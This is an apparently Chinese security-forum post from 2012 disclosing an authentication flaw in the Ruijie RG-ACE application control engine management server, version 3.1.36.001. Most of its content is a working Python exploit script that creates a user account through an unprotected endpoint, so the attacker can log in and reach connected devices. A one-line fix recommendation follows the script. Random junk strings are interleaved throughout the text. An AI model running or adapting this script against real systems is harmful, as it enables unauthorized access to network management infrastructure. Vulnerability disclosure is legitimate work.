中国网络渗透测试联盟
标题:
锐捷应用控制引擎管理服务器可以增加用户
[打印本页]
作者:
admin
时间:
2012-12-10 10:16
标题:
锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接
http://www.ruijie.com.cn/service/down-search.aspx
显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
, h3 P/ X) v7 S; p: Q7 {8 b9 I
* G8 k& J; X) N/ l+ J
0 q9 u2 s9 F6 z2 v
测试的具体版本是
5 U( z* z* [: v% @
产品名称: 锐捷应用控制引擎
6 x( T: a. m0 y8 D! L9 Q. T" [- c! _
版本号: 3.1.36.001 TC
4 N$ w* r4 F) P8 b/ V# f: w" D
编译时间: 201104291730
8 W: J) K6 @8 R3 N) F) h
( m2 r5 K8 W' K3 E% g$ j" ?8 q
# r/ v( Q. p: C* `! m
漏洞证明:
. r4 v4 i* f9 K$ ~' V
" o. t' j6 A* q7 W- @" _3 f
5 R+ z) a. f3 J
; {0 s& d3 J7 G1 C: r
) f# t; J$ t" Z0 C( h
8 h8 [( Z7 F% P" C0 `8 O6 C
4 V" g' _3 z: a2 L, p
执行脚本
! n% _' J/ C4 V% {
#! /usr/bin/env python
9 O$ J3 T8 b7 e+ {: O) t8 U) ]
#coding=gbk
' z0 m: b3 Y* n+ _# k. {) b; u8 Q- A
#RG-ACE管理服务器 V3.1.36.001
9 Z) U5 ^0 V6 a: z
import urllib2, urllib,cookielib
6 u, F; T' T( l& ^' q! W
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
! o0 l2 i; k* b' h- J) [0 u1 g
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
" n i0 f! _, Z4 y8 L0 V' f5 _
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
5 _; d7 I8 ^1 X$ x( h
post=(("event","userManager.doInsertUserInfo"),
( k3 \3 f1 {1 I: \, W4 B
("useractionname","addButtonValue"),
6 C# t, v B" |; ~1 r
("useropermanager","userManager"),
' h# z! U) l5 E! h7 Q8 o) V( s
("userName","t"), #######账号自己加
9 b) Y. D) F6 J
("pwd","aaaaaa"),######密码自己加
; A2 q0 J7 ?2 } P$ G6 t, T
("trueName","ad"),
5 Z; ]& }: T Q% T8 c9 Y& O
("email",""),
! d5 [: i: Q8 A- I2 B+ A
("mobilePhone",""),
) A% F1 z2 b$ u; s7 p
("officePhone",""),
' C9 t0 n' R7 @% c8 f
("addr",""),
' @ m/ q5 x0 U4 [. w" n
("submit","确定"))
; W+ L' v; d' N: W# v' O. i; U3 w
urllib2.install_opener(opener)
3 s+ `% Y6 |% K3 g- U5 Z/ \; p
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
% D L9 U* X! k2 D2 E+ r* i$ ]' p
print "Done"
" D6 T3 Z6 e. W, n& B# t5 e2 |
- q& U$ [! w5 }
登录,连接设备
0 }# D# W6 R' n! w% u9 e
' _4 E9 f; V: R- X) m9 Z4 @
7 h0 l/ _- }: T2 }1 T+ m; l
+ @4 ?8 [' J( M6 ?
3 W, F7 r2 Z. C8 G4 |
$ m" z! `) `5 Z( f9 V
默认的管理员admin权限更大点
' G% Z& w" i8 h+ K" ~# I
( \6 T, E" b* b5 q
- |+ d/ X- \, W* C
( D) ^$ Z6 o& h' S: e/ S
8 I8 }; o6 V8 n* J
4 n8 f+ z7 ?( f( q* X7 l/ p. b( i
修复方案:
! v2 W; d( k4 q2 a, }5 y( u
加强对接口的权限验证
1 w: ~2 E2 d1 K5 O! Q( I$ i7 }
% `8 `# X4 h: h) r3 R; p8 E
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2